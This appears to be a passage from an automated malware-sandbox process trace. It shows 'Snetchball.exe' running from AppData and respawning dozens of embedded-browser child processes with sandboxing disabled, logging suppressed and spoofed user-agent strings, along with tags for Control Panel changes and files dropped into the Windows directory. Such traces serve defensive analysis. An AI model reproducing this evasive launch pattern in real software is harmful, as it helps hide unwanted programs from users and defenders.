        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3664 --field-trial-handle=2812,i,8163050573244031866,10380674915939296453,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        39⤵
        
        PID:8060
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        40⤵
        Modifies Control Panel
        
        PID:6748
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        41⤵
        Drops file in Windows directory
        Modifies Control Panel
        
        PID:5560
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2824 --field-trial-handle=2828,i,7100713131002881636,16673668393884547214,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2
        42⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3128 --field-trial-handle=2828,i,7100713131002881636,16673668393884547214,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        42⤵
        
        PID:7696
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3612 --field-trial-handle=2828,i,7100713131002881636,16673668393884547214,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8
        42⤵
        
        PID:7332
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3628 --field-trial-handle=2828,i,7100713131002881636,16673668393884547214,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        42⤵
        
        PID:2260
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3668 --field-trial-handle=2828,i,7100713131002881636,16673668393884547214,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        42⤵
        
        PID:964
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        43⤵
        
        PID:5632
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        41⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        41⤵
        
        PID:8120
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        41⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        41⤵
        
        PID:8028
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        41⤵
        
        PID:6404
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        40⤵
        
        PID:6284
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        40⤵
        
        PID:3472
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        40⤵
        
        PID:1280
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        40⤵
        
        PID:8164
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        40⤵
        
        PID:4808
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3692 --field-trial-handle=2812,i,8163050573244031866,10380674915939296453,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        39⤵
        
        PID:8072
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4208 --field-trial-handle=2812,i,8163050573244031866,10380674915939296453,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        39⤵
        
        PID:7272
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        38⤵
        
        PID:7080
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        38⤵
        
        PID:1848
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        38⤵
        
        PID:4884
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        38⤵
        
        PID:1160
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        38⤵
        
        PID:7992
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        37⤵
        
        PID:7216
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        37⤵
        
        PID:6496
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        37⤵
        
        PID:6248
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        37⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        37⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3668 --field-trial-handle=2816,i,6835565147080286429,15134625588813713346,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        36⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (iPad; CPU OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/123.0.6312.52 Mobile/15E148 Safari/604.1" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3576 --field-trial-handle=2816,i,6835565147080286429,15134625588813713346,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        36⤵
        
        PID:7964
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        35⤵
        
        PID:2316
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        35⤵
        
        PID:7180
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        35⤵
        
        PID:2604
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        35⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        35⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        34⤵
        
        PID:3600
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        34⤵
        
        PID:5988
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        34⤵
        
        PID:7572
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        34⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        34⤵
        
        PID:428
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3700 --field-trial-handle=2828,i,9931231403639750034,11152626130478854906,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        33⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3880 --field-trial-handle=2828,i,9931231403639750034,11152626130478854906,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        33⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        32⤵
        
        PID:5788
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        32⤵
        
        PID:2584
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        32⤵
        
        PID:5172
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        32⤵
        
        PID:6640
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        32⤵
        
        PID:5140
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        31⤵
        
        PID:6056
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        31⤵
        
        PID:5184
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        31⤵
        
        PID:2764
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        31⤵
        
        PID:7508
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        31⤵
        
        PID:3124
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3676 --field-trial-handle=2804,i,1421291830089692137,2727942343725945860,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        30⤵
        
        PID:2356
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2668 --field-trial-handle=2804,i,1421291830089692137,2727942343725945860,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        30⤵
        
        PID:6744
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        29⤵
        
        PID:7208
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        29⤵
        
        PID:7972
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        29⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        29⤵
        
        PID:4664
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        29⤵
        
        PID:6816
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        28⤵
        
        PID:4660
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        28⤵
        
        PID:5448
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        28⤵
        
        PID:4604
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        28⤵
        
        PID:7160
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        28⤵
        
        PID:5276
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3648 --field-trial-handle=2856,i,280347972694214054,15786151154430149163,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        27⤵
        
        PID:7152
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1964 --field-trial-handle=2856,i,280347972694214054,15786151154430149163,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        27⤵
        
        PID:7008
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        26⤵
        
        PID:7520
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        26⤵
        
        PID:4596
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        26⤵
        
        PID:4552
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        26⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        26⤵
        
        PID:3092
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        25⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        25⤵
        
        PID:3992
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        25⤵
        
        PID:5260
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        25⤵
        
        PID:4524
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        25⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        23⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        23⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        23⤵
        
        PID:5828
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        23⤵
        
        PID:7032
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        23⤵
        
        PID:5352
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        22⤵
        
        PID:4084
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        22⤵
        
        PID:6352
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        22⤵
        
        PID:6212
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        22⤵
        
        PID:5592
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        22⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3416 --field-trial-handle=2840,i,16138836492212212970,6335343807123212309,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        21⤵
        
        PID:7440
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Mobile Safari/537.36" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3432 --field-trial-handle=2840,i,16138836492212212970,6335343807123212309,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1
        21⤵
        
        PID:5996
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        20⤵
        
        PID:5696
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        20⤵
        
        PID:1780
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        20⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        20⤵
        
        PID:5948
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        19⤵
        
        PID:6232
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        19⤵
        
        PID:7964
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        19⤵
        
        PID:2296
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
        "C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"
        19⤵
        
        PID:2936
        
        C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe
        
